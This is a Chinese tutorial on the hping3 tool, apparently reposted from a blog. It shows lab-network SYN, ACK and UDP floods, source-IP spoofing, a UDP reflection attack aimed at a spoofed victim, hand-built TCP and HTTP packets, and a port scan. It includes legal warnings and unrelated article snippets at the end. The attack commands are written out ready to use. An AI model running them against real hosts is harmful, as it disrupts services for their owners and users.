使用hping3网络工具构造TCP/IP数据包和进行DDos攻击

1 概述

  • hping3是一个强大的命令行工具,用于生成、发送和解析TCP/IP协议的数据包。它是开源的网络安全工具,由Salvatore Sanfilippo开发,主要应用于网络审计、安全测试和故障排查等领域。hping3不仅可以作为普通的网络连通性检测工具,还因其高度的灵活性和可定制性而被广泛用于渗透测试、防火墙测试、DoS/DDoS攻击模拟以及协议漏洞研究。
  • 本文章主要介绍如何使用hping3进行常见的DDos攻击。构造IP,TCP,UDP,ICMP,HTTP等数据包的方法。还有如何使用hping3进行端口扫描。hping3的功能也不止文章中介绍的这些,其他功能读者可自行去探索。

2 hping3安装

  • 以Centos平台为例,先要安装以下两个依赖包
  •   yum install libpcap-develyum install tcl-develln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
    
  • hping3下载地址
  • 在github下载源码后,解压后通过以下命令安装
  •   ./configuremake make stripmake install
    

3 命令简介

  • 这里只介绍本文章中使用到的一些命令,全部命令可以执行 hping3 --help查看。
  •   # hping3 host [options]-h  --help        	# 显示帮助-c  --count       	# 发送数据包的数目-i  --interval    	# 发送数据包间隔的时间 (uX即X微秒, 例如: -i u1000)--fast        	# 等同 -i u10000 (每秒10个包)--faster      	# 等同 -i u1000 (每秒100个包)--flood       	# 尽最快发送数据包,不显示回复# 模式选择  default mode      	# 默认模式是TCP-0  --rawip       	# RAW IP模式,原始IP模式。-1  --icmp        	# ICMP模式-2  --udp         	# UDP模式-8  --scan        	# 扫描模式,扫描指定的端口# Example: hping3 --scan 1-30,70-90 -S www.target.host-9  --listen      	# 监听模式# IP 模式  -a  --spoof       	# 设置源地址。在进行DDos攻击时可以使用这个参数伪造IP--rand-dest   	# 随机目的地址模式,详细使用 man 命令--rand-source 	# 随机源地址模式,详细使用 man 命令-t  --ttl         	# 指定 ttl 值 (默认 64)# ICMP 模式-C  --icmptype    	# icmp类型,默认回显(echo)请求# UDP/TCP 模式-s  --baseport    	# 设置源端口,默认为随机源端口-p  --destport    	# 设置目的端口,默认端口为0-k  --keep        	# 保持源端口不变(默认在发送一个包后端口号会递增)-w  --win         	# win的滑动窗口。windows发送字节(默认64)-M  --setseq      	# 设置TCP序列号-L  --setack      	# set TCP ack,不是 TCP 的 ACK 标志位-F  --fin         	# set FIN flag  -S  --syn         	# set SYN flag  -R  --rst         	# set RST flag  -P  --push        	# set PUSH flag  -A  --ack         	# set ACK flag-U  --urg         	# set URG flag# 通用设置  -d  --data        	# 发送数据包的大小,默认为0-E  --file          # 发送指定文件内的数据-e  --sign        	# 指定发送的数据
    

4 hping3实现DDos攻击

  • 关于DDos攻击原理可参考这篇文章 DDos攻击原理
  • 这里先准备两台主机,使用hping3进行攻击的主机为192.168.206.137,被攻击主机为192.168.1.2。被攻击主机我们先开启一个8088的TCP端口。

4.1 SYN Flood

  • 先进行较常见的SYN Flood攻击
    请添加图片描述

  •   hping3 192.168.1.2 --syn -p 8088 -c 5 -i u500000
    
  • 参数介绍

    • 192.168.1.2 : 被攻击的主机ip
    • –syn : 进行SYN攻击
    • -p : 被攻击主机端口。在实际场景中,可以通过NMap等端口扫描工具来判断哪些端口是开放的。
    • -c : 发送数据包的数目
    • -i : 发送数据包间隔时间
  • 通过WireShark看下数据包
    在这里插入图片描述

  • 可以看到攻击者发起一个SYN请求,被攻击者进行了一个ACK回应,但攻击者不会响应,又重新发起SYN请求。

  • 上面演示的攻击,攻击者需要等待被攻击者响应一个ACK才会继续发送SYN,可以加个–flood参数,不需要等待ACK响应,持续发送SYN请求

  •   hping3 192.168.1.2 --syn -p 8088 -c 5 -i u500000 --flood
    
  • 可以看下效果
    在这里插入图片描述

  • 还可以在攻击时通过-a参数伪造源IP地址

  •   hping3 -a 192.168.11.22 192.168.1.2 --syn -p 8088 -c 5 -i u500000
    
  • 实际的攻击者IP为192.168.206.137,这里伪造成了192.168.11.22
    在这里插入图片描述

  • 这里演示只使用了一台电脑进行攻击,其实是看不到什么效果的。实际的DDos攻击,可能需要上万台电脑同时发起攻击,如果上万台电脑不间断的持续发送SYN请求,很快就会达到服务器并发处理能力的上限,导致服务瘫痪。

4.2 ACK Flood

  • 再看下ACK攻击
  •   hping3 192.168.1.2 --ack -p 8088 -c 5 -i u500000
    
  • 直接抓包看下数据
    在这里插入图片描述

4.3 UDP DDos攻击

  • 在被攻击主机192.168.1.2上开启一个8089的UDP端口
  •   hping3 -c 5 -e "hello" -d 5 --udp -p 8089 192.168.1.2
    
  • -e表示发送的数据,-d表示发送的数据大小。
    在这里插入图片描述

4.4 UDP反射放大攻击

  • 攻击原理:首先有一台UDP服务器192.168.1.2,给这台服务器发送一个较小的数据请求,UDP服务器会进行数据量很大的响应。攻击者操控肉鸡192.168.206.137进行攻击,并将肉鸡的IP伪造成被攻击者的IP,这样肉鸡192.168.206.137发送请求后,UDP服务器会对攻击目标192.168.206.133进行响应。

  • 如果肉鸡频繁的发送查询请求,UDP服务器就会频繁的对攻击目标进行响应,导致攻击目标服务瘫痪。
    请添加图片描述

  • 攻击命令

  •   hping3 -a 192.168.206.133 -s 1024 -k -c 5 -e "hello" -d 5 --udp -p 8089 192.168.1.2
    
  • 参数介绍

    • -a : 伪造ip地址为攻击目标的地址
    • -s : 指定源端口号,这里就可以伪造成攻击目标的端口号
    • -k : 保持源端口号不变,否则发送一个请求后,源端口号会递增
  • 借助一个UDP调试工具看下效果
    在这里插入图片描述

  • 可以看到,请求本来是肉鸡192.168.206.137发送给UDP服务的,但实际上UDP服务响应到了攻击目标192.168.206.133上。

4.5 备注

  • 这里演示了典型的几种DDos攻击方式,其它攻击方式读者可自行去测试。测试时最好使用自己搭建的内网服务,不要对公网服务去进行攻击。
  • 依据《中华人民共和国刑法》第二百八十五条【非法侵入计算机信息系统罪】:非法侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统以及其他重要计算机信息系统的,处三年以下有期徒刑或者拘役。
  • 依据《中华人民共和国刑法》第二百八十六条【破坏计算机信息系统罪】:对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。

5 hping3构造自定义数据包

5.1 构造TCP数据包

  • TCP包头
    请添加图片描述
  • 可以构造一个TCP数据包,包头的源端口号,目标端口号,标志位,窗口大小都可以去设置。也可以通过-a参数伪造源IP地址,上面DDos攻击介绍过,这里就不再描述过。
  •   hping3 -c 1 -S -A -s 10010 -w 1024 -p 8088 -d 10 -e "helloworld" 192.168.1.2
    
  • 看下抓包
    在这里插入图片描述

5.2 构造UDP数据包

  • UDP包头
    请添加图片描述

  • UDP包头比较简单,一般可以设置源端口和目标端口号

  •   hping3 -c 1 -e "hello" -d 5 --udp -p 8089 192.168.1.2
    

    在这里插入图片描述

5.3 构造ICMP数据包

  • ICMP协议主要用于确认IP数据包是否成功送达目标地址,我们经常使用的ping命令就是使用的ICMP协议。
  • 可以通过hping3构造一个ICMP数据包,构造ICMP包的命令比较简单
  •   hping3 --icmp -c 1 192.168.1.2
    
  • 抓包看下
    在这里插入图片描述

5.4 构造IP数据包

  • IP数据包包头
    请添加图片描述
  • 构造IP数据包,可以设置源地址,目标地址,生存时间,协议等字段
  •   hping3 --rawip -c 1 -t 126 --ipproto 6 -a 192.168.2.2 192.168.1.2
    
    在这里插入图片描述
  • Protocol较常用的主要有以下几种
    • 1 : ICMP
    • 4 : IP
    • 6 : TCP
    • 17 : UDP
    • 41 : IPv6

5.5 通过IP数据包构造TCP数据包

  • 我们知道IP数据包位于网络层,TCP数据包位于传输层。TCP数据包就是在IP数据包的基础上构造的,因此可以直接在IP数据包的数据部分构造一个TCP数据包。听不懂没关系,举个栗子。

  • 首先需要一个二进制数据编译器。这里可以使用Notepad++的插件,在菜单栏找到Plugins->Plugins Admin,搜索Hex-Editor,点击安装
    在这里插入图片描述

  • 安装完成后在菜单栏Plugins下就会多出一个Hex-Editor插件,点击View in HEX就可以编辑二进制文件了。
    在这里插入图片描述

  • 接下来就构造一个TCP数据包,再看下TCP数据包头结构
    请添加图片描述

  • 构造的数据包内容(16进制显示)

  •   27 60 27 62 00 00 00 05 00 00 00 06 50 12 10 08 17 14 00 00
    
  • 首先需要设置源端口号和目标端口号,各占16位,分别为0x2760和0x2762,对应的十进制分别是10080和10082。

  • 接下来设置序列号和确认应答号,各占32位,分别为0x00000005和0x00000006,但是这两位设置后抓包看不到效果,可能是网络传输过程中重置了,后续再研究下。

  • 数据偏移和保留位这里设置为0x50。

  • 然后是非常重要的标志位,比如我们想把SYN和ACK置位,二进制位就需要设置为00010010,那么对应的十六进制就是0x12。

  • 窗口大小占16位,设置为0x1008,对应的十进制为4104

  • 校验和设为0x1714,后面不需要特别设置的可设为0。

  • 看下文件中的内容
    在这里插入图片描述

  • 文件编辑好后,传到Centos上,通过以下命令将文件作为数据发送

  •   hping3 --rawip -c 1 --ipproto 6 -E tcp.txt -d 20 192.168.1.2
    
  • 通过–ipproto指定协议类型为TCP,通过-E参数指定要发送的文件。

  • 抓包可以看下效果
    在这里插入图片描述

  • 首先我们构造的是IP数据包,但实际上已经是TCP数据包了。并且端口号和标志位等信息就是我们在文件中设置的信息。这里只设置了包头,也可以在后面继续设置数据信息。通过同样的方法可以构造UDP数据包等。

5.6 通过IP数据包构造HTTP数据包

  • hping3没有提供构造应用层协议的命令,那么能不能构造应用层协议呢?当然可以,参考勇IP数据包构造TCP数据包的方法,可以在此基础上继续构造应用层数据包,比如HTTP数据包。
  •   27 60 27 62 20 20 20 05 20 20 20 06 50 12 10 08 17 14 00 00 47 45 54 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 2e 31 2e 32 0d 0a 0d 0a  
    
  • TCP数据包的内容不变,在后面继续构造HTTP数据包
    在这里插入图片描述
  • 使用同样的命令继续发送,-d指定的大小要改成文件实际大小
  •   hping3 --rawip -c 1 --ipproto 6 -E tcp.txt -d 57 192.168.1.2
    
  • 抓包可以看到,数据包已经变成了HTTP数据包
    在这里插入图片描述
  • 通过这种方法,我们几乎可以构造传输层和应用层的所有网络协议。

6 端口扫描

  • hping3也支持端口扫描,扫描主机192.168.1.2的1-1024端口状态
  •   hping3 --scan 1-1024 -S 192.168.1.2
    
  • 看下扫描结果
    在这里插入图片描述
  • 端口扫描建议使用Nmap工具,使用相对方便。hping3的其他扫描命令就不过多介绍了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/784775.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【蓝桥杯第十三届省赛B】(部分详解)

九进制转十进制 #include <iostream> #include<math.h> using namespace std; int main() {cout << 2*pow(9,3)0*pow(9,2)2*pow(9,1)2*pow(9,0) << endl;return 0; }顺子日期 #include <iostream> using namespace std; int main() {// 请在此…

ROS2从入门到精通1-2:详解ROS2服务通信机制与自定义服务

目录 0 专栏介绍1 服务通信模型2 服务模型实现(C)3 服务模型实现(Python)4 自定义服务5 话题、服务通信的异同 0 专栏介绍 本专栏旨在通过对ROS2的系统学习&#xff0c;掌握ROS2底层基本分布式原理&#xff0c;并具有机器人建模和应用ROS2进行实际项目的开发和调试的工程能力。…

智慧公厕是什么?智慧公厕的主要功能、特点?

智慧公厕&#xff0c;顾名思义&#xff0c;是指应用了智能科技的公共厕所&#xff0c;旨在提供更加便捷、舒适、智能化的卫生服务。相比传统的公厕&#xff0c;智慧公厕不仅拥有更加智能化的设备&#xff0c;还配备了远程监控与管理系统&#xff0c;以及节能环保技术&#xff0…

如何选择优质的外贸网站建设公司?

在当今数字化时代&#xff0c;外贸行业越来越重视在线渠道的发展&#xff0c;而外贸网站建设作为企业对外联系的重要窗口&#xff0c;扮演着至关重要的角色。选择一家优质的外贸网站建设公司&#xff0c;不仅能帮助企业提升品牌形象&#xff0c;还能有效扩大海外市场。那么&…

微信小程序【从入门到精通】——服务器的数据交互

&#x1f468;‍&#x1f4bb;个人主页&#xff1a;开发者-曼亿点 &#x1f468;‍&#x1f4bb; hallo 欢迎 点赞&#x1f44d; 收藏⭐ 留言&#x1f4dd; 加关注✅! &#x1f468;‍&#x1f4bb; 本文由 曼亿点 原创 &#x1f468;‍&#x1f4bb; 收录于专栏&#xff1a…

linux C:变量、运算符

linux C 文章目录 变量运算符 一、变量 [存储类型] 数据类型 标识符 值 标识符&#xff1a;由数字、字母、下划线组成的序列&#xff0c;不能以数字开头。 数据类型&#xff1a;基本数据类型构造类型 存储类型&#xff1a;auto static…

Linux(CentOS7)配置系统服务以及开机自启动

目录 前言 两种方式 /etc/systemd/system/ 进入 /etc/systemd/system/ 文件夹 创建 nginx.service 文件 重新加载 systemd 配置文件 ​编辑 配置开机自启 /etc/init.d/ 进入 /etc/init.d/ 文件夹 创建 mysql 文件 编写脚本内容 添加/删除系统服务 配置开机自启 …

【MySQL笔记】SELECT COUNT(*) 的时候,加不加where条件有差别吗?

文章目录 前言实验结论 前言 这部分很多帖子都只在问题里罗列下&#xff0c;好像也没详细解答 其实就是跟InnoDB优先走二级索引的优化有关&#xff0c;前面也提到了”优化的前提是查询语句中不包含where条件和group by条件“ 还不太了解这个优化的朋友可以看上一篇帖子 实验 …

编曲知识13:弦乐技法应用 合成器应用 声场摆位

弦乐技法 技法分类 Sustain(长音)类: Legato、Port、Gliss、Tremolo、Trills Staccato(短音)类: Staccato、Pizzicato、Spiccato Legato:连奏 Port:滑音 Gliss:慢速滑音 Tremolo:震音 Trills:颤音 Staccato:顿弓 Pizzicato:拨奏 Spiccato:跳弓 长音类技法 主…

从0到1:兼职招聘小程序开发笔记(一)

可行性分析 兼职招聘小程序&#xff1a;为雇主和求职者提供便利的平台&#xff0c;旨在帮助雇主招聘兼职员工&#xff0c;并让求职者寻找合适的兼职工作。提供简单、快捷的方式来匹配兼职岗位和候选人&#xff0c;节省了招聘和求职的时间和精力。其主要功能模块包括&#xff1…

C练习题(1)

变种水仙花&#xff08;来自牛课网&#xff09; 题目 变种水仙花数 - Lily Number&#xff1a;把任意的数字&#xff0c;从中间拆分成两个数字&#xff0c;比如1461 可以拆分成&#xff08;1和461&#xff09;,&#xff08;14和61&#xff09;,&#xff08;146和1),如果所有拆…

力扣刷题Days29-128.最长连续数列(js)

目录 1&#xff0c;题目 2&#xff0c;代码 2.1自己实现 2.2哈希表 3&#xff0c;学习与收获 枚举思想&#xff1a; 遍历的核心逻辑 碎碎念 本题 先是想到利用数组排序&#xff0c;从而简化遍历处理逻辑&#xff0c;再在提交错误提醒的情况下&#xff0c;考虑到数组中存…

基于FreeRTOS系统的STM32简易遥控器设计

项目说明 该项目是一个基于FreeRTOS系统的Stm32遥控器设计。使用该项目主要是自己学习FreeRTOS的使用&#xff0c;以及模块化编程的思想。这个项目应该长期会有更新。 项目开源 github:https://github.com/snqx-lqh/Stm32RemoteControl gitee:https://gitee.com/snqx-lqh/S…

Github 2024-04-01 开源项目月报 Top20

根据Github Trendings的统计,本月(2024-04-01统计)共有20个项目上榜。根据开发语言中项目的数量,汇总情况如下: 开发语言项目数量Python项目9TypeScript项目2非开发语言项目2Jupyter Notebook项目2HTML项目1CSS项目1C#项目1Shell项目1Lua项目1JavaScript项目1C项目1Java项目…

了解 LoadRunner 性能测试软件及其基础使用

目录 一、了解LoadRunner 1、什么是Loadrunner&#xff1f; 2、Loadrunner包括什么组件&#xff1f; &#xff08;1&#xff09;前台组件 &#xff08;2&#xff09;后台组件 二、LoadRunner三大组件 1、VuGen&#xff08;虚拟用户脚本生成器&#xff09; &#xff08;…

详细分析Mysql中的STR_TO_DATE基本知识(全)

目录 前言1. 基本知识2. Demo3. 实战Demo4. Sql彩蛋4.1 LPAD函数4.2 SUBSTRING_INDEX函数 5. Java彩蛋 前言 对于该知识点&#xff0c;主要因为数据库类型为String&#xff08;类似2024-03-26&#xff09;&#xff0c;放置于后端操作后&#xff0c;需要自定义比较&#xff0c;…

【QT+QGIS跨平台编译】054:【exiv2lib_int+Qt跨平台编译】(一套代码、一套框架,跨平台编译)

点击查看专栏目录 文章目录 一、exiv2lib_int介绍二、文件下载三、文件分析四、pro文件五、编译实践一、exiv2lib_int介绍 exiv2lib_int是 exiv2 这个开源的图像元数据库中的一个组件。 Exiv2是一个开源的C++库,用于读取、编辑和写入图片和视频文件的元数据。它可以处理各种类…

选择Six Sigma咨询公司,看准这几点不踩坑!

在如今的市场环境中&#xff0c;Six Sigma作为一种追求卓越的管理方法&#xff0c;受到了越来越多企业的青睐。然而&#xff0c;面对众多的Six Sigma咨询公司&#xff0c;企业往往感到困惑&#xff1a;究竟哪家公司更适合自己&#xff1f;今天&#xff0c;我们就来聊聊如何挑选…

ES2024即将发布!5个可能大火的JS新方法

文章目录 01&#xff1a;Promise.withResolvers02&#xff1a;Object.groupBy()03&#xff1a;Temporal04&#xff1a;Records 和 Tuples05&#xff1a;装饰器&#xff08;Decorators&#xff09;其他 ECMAScript 2024&#xff08;ES15&#xff09; 即将发布&#xff08;2024年…

【数字IC/FPGA】手撕代码:模3检测器(判断输入序列能否被3整除)

今天我们来手撕一个常见的笔试题&#xff0c;使用的方法是三段式Moore状态机。 题目描述&#xff1a; 输入端口是串行的1bit数据&#xff0c;每个时钟周期进来一位新数据后&#xff0c;实时检查当前序列是否能整除3&#xff0c;若能则输出1&#xff0c;否则输出0。 例如&#…